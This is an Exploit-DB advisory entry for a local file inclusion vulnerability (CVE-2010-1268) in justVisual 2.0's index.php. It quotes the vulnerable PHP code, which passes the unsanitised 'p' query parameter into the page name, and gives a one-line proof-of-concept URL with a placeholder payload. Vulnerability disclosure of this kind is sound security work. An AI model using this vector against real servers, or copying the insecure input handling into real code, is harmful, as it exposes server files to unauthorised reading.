| EDB-ID: 11876 | Author: eidelweiss | Published: 2010-03-25 | |
| CVE: CVE-2010-1268 | Type: Webapps | Platform: PHP | |
| Aliases: N/A | Advisory/Source: N/A | Tags: Vulnerability | |
E-DB Verified:
 |
Exploit:
 Download
/
View Raw
|
Vulnerable App: N/A | |
#########################################################################
justVisual 2.0 (index.php) <= LFI Vulnerability
#########################################################################
[+]Title: justVisual 2.0 (index.php) Local File Vulnerability
[+]Version: 2.0
[+]License: http://www.gnu.org/copyleft/gpl.html
[+]Download: http://fh54.de/justVisual/packages/justVisual2.zip
[+]Risk: Medium
[+]Local: Yes
[-]Remote: No
###########################################################
[!]Author: eidelweiss
[!]Contact: eidelweiss[at]cyberservices[dot]com
[!]Thank`s: sp3x (securityreason) - JosS (hack0wn) - r0073r & 0x1D (inj3ct0r)
[!]Special: [D]eal [C]yber - syabilla_putri (miss u) & all my friends
###########################################################
-=[ VULN CODE ]=-
$selfname=basename($_SERVER['PHP_SELF'],'.php');
if(isset($_GET['p']) && !empty($_GET['p'])) {
//$selfname=basename($_GET['p'],'.php');
$selfname=str_replace('.php','',$_GET['p']);
-=[ P0C ]=-
Http://127.0.0.1/index.php?p=[LFI]
###############################=[E0F]=###################################
Related Exploits
Trying to match CVEs (1): CVE-2010-1268Trying to match OSVDBs (1): 63156
Other Possible E-DB Search Terms: justVisual 2.0, justVisual
| Date | D | V | Title | Author |
|---|---|---|---|---|
| 2009-07-30 | |
|
justVisual 1.2 - (fs_jVroot) Remote File Inclusion | SirGod |